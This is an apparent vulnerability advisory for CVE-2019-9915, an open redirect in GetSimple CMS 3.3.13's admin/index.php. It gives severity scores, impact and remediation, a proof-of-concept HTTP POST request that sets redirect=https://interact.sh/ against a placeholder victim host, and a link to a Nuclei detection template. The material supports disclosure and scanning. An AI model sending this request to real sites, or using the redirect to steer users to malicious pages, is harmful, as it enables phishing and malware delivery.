| Title | GetSimple CMS 3.3.13 - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. |
| Remediation | Upgrade to the latest version of GetSimple CMS to fix the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.08964 |
| CVE ID | CVE-2019-9915 |
| CWE ID | CWE-601 |
| Tags | cve cve2019 redirect getsimple cms get-simple. vuln |
GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
userid=KJVGeX&pwd=VIe8cn&submitted=Login
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9915.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-9915.pcap
N/AN/A